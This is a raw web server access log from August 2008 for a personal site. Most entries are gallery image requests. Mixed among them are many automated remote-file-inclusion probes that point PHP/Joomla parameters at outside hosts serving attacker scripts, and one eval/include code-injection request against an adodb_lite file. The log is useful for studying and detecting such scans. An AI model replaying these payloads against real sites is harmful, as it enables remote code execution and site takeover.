206.190.75.8 - - [21/Aug/2008:11:38:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-164_0.jpg HTTP/1.1" 200 352144 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-168.jpg HTTP/1.1" 200 421778 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-170.jpg HTTP/1.1" 200 334647 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:36 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-173.jpg HTTP/1.1" 200 357615 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:36 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-159_0.jpg HTTP/1.1" 200 381556 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:36 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-186.jpg HTTP/1.1" 200 342411 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:36 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-128_0.jpg HTTP/1.1" 200 488795 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:37 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-189.jpg HTTP/1.1" 200 464516 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:37 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-195.jpg HTTP/1.1" 200 323860 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:37 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-198.jpg HTTP/1.1" 200 376218 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:38 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-160_0.jpg HTTP/1.1" 200 539450 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-204.jpg HTTP/1.1" 200 294185 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-203.jpg HTTP/1.1" 200 303099 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-205.jpg HTTP/1.1" 200 338524 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:40 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-215.jpg HTTP/1.1" 200 429846 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:41 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-210.jpg HTTP/1.1" 200 363096 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:41 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-230.jpg HTTP/1.1" 200 536179 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:41 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-257.jpg HTTP/1.1" 200 565418 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:38:41 -0700] "GET //?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9899 "-" "libwww-perl/5.808" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:42 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-271.jpg HTTP/1.1" 200 514810 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:42 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-273.jpg HTTP/1.1" 200 261409 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:42 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-209.jpg HTTP/1.1" 200 387025 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:43 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-274.jpg HTTP/1.1" 200 312607 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:43 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-275.jpg HTTP/1.1" 200 309469 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:43 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-265.jpg HTTP/1.1" 200 488517 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:38:43 -0700] "GET /logs/access_080802.log//index.php?abg_path=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:44 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-268.jpg HTTP/1.1" 200 445988 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:44 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-282.jpg HTTP/1.1" 200 300566 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:45 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-280.jpg HTTP/1.1" 200 371621 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:45 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-285.jpg HTTP/1.1" 200 238342 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-276.jpg HTTP/1.1" 200 371770 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-286.jpg HTTP/1.1" 200 270186 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-278.jpg HTTP/1.1" 200 369205 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:38:48 -0700] "GET //index.php?abg_path=http://roux.be/Joomla/id.txt? HTTP/1.1" 200 9864 "-" "libwww-perl/5.79" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:49 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-290.jpg HTTP/1.1" 200 442909 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:38:50 -0700] "GET /logs/access_080628.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-068_1.jpg HTTP/1.1" 200 432455 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:51 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-017_2.jpg HTTP/1.1" 200 453605 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:51 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-292.jpg HTTP/1.1" 200 332939 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:38:54 -0700] "GET /logs//index.php?abg_path=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:38:57 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:38:57 -0700] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:39:00 -0700] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:11:39:05 -0700] "GET /logs/access_080810.log/errors.php?error=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.128 - - [21/Aug/2008:11:39:09 -0700] "GET /logs/access_080720.log//index/login.php?DOCUMENT_ROOT=http://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:39:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-208.jpg HTTP/1.1" 200 375523 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
190.83.18.253 - - [21/Aug/2008:11:39:11 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:39:15 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 61575 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:39:19 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:39:23 -0700] "GET //?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9899 "-" "libwww-perl/5.808" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:39:33 -0700] "GET /logs/access_080124.log//errors.php?error=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:39:33 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-176_0.jpg HTTP/1.1" 200 253958 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:39:34 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-039_1.jpg HTTP/1.1" 200 475989 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
213.165.80.16 - - [21/Aug/2008:11:39:39 -0700] "GET /logs/access_080707.log/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:39:41 -0700] "GET /logs/access_080811.log/index2.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:39:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-169.jpg HTTP/1.1" 200 361968 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:39:47 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-036_4.jpg HTTP/1.1" 200 384312 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:39:51 -0700] "GET /logs/access_080802.log//index.php?abg_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:39:52 -0700] "GET //index.php?abg_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 9884 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:39:55 -0700] "GET /logs/access_080101.log%20//errors.php?error=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:40:00 -0700] "GET /logs//index.php?abg_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:11:40:02 -0700] "GET /logs/access_080812.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:11:40:02 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:11:40:02 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:40:03 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-142_1.jpg HTTP/1.1" 200 330465 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
87.101.4.49 - - [21/Aug/2008:11:40:03 -0700] "GET /logs/access_080312.log//admin/index.php?o=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:40:03 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-101_1.jpg HTTP/1.1" 200 453645 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
87.101.4.49 - - [21/Aug/2008:11:40:04 -0700] "GET //admin/index.php?o=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [21/Aug/2008:11:40:04 -0700] "GET /logs//admin/index.php?o=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:40:09 -0700] "GET /logs/access_080725.log/index2.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:11:40:09 -0700] "GET /logs/access_080611.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:11:40:10 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 9909 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:11:40:11 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:40:19 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-254.jpg HTTP/1.1" 200 298755 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
200.93.147.155 - - [21/Aug/2008:11:40:22 -0700] "GET /logs//index.php?option=com_joomlaboard&Itemid=33&func=showcat&catid=&mosConfig_absolute_path=http://www.geocities.com/sak4w/rfi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
200.93.147.155 - - [21/Aug/2008:11:40:23 -0700] "GET //index.php?option=com_joomlaboard&Itemid=33&func=showcat&catid=&mosConfig_absolute_path=http://www.geocities.com/sak4w/rfi/test.txt??? HTTP/1.1" 200 9974 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:11:40:23 -0700] "GET /logs/access_080614.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:40:25 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9941 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.182.98 - - [21/Aug/2008:11:40:29 -0700] "GET /logs//include/main.php?lang=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
70.84.182.98 - - [21/Aug/2008:11:40:31 -0700] "GET //include/main.php?lang=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:40:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-039_0.jpg HTTP/1.1" 200 313811 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:40:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-053_1.jpg HTTP/1.1" 200 235960 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
80.67.20.130 - - [21/Aug/2008:11:40:39 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:40:43 -0700] "GET ///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:40:44 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:11:40:44 -0700] "GET /logs/access_080611.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:40:45 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9937 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:11:40:46 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 9909 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:11:40:47 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.101.4.49 - - [21/Aug/2008:11:40:50 -0700] "GET /logs/access_080804.log/errors.php?error=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [21/Aug/2008:11:40:51 -0700] "GET /errors.php?error=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [21/Aug/2008:11:40:51 -0700] "GET /logs/errors.php?error=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.88.192.8 - - [21/Aug/2008:11:40:52 -0700] "GET /logs/access_080810.log/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:40:53 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-086_1.jpg HTTP/1.1" 200 401229 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:40:56 -0700] "GET /logs/access_080229.log///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:11:41:00 -0700] "GET /logs/access_080614.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:41:00 -0700] "GET /logs/access_080229.log///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:41:02 -0700] "GET ///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
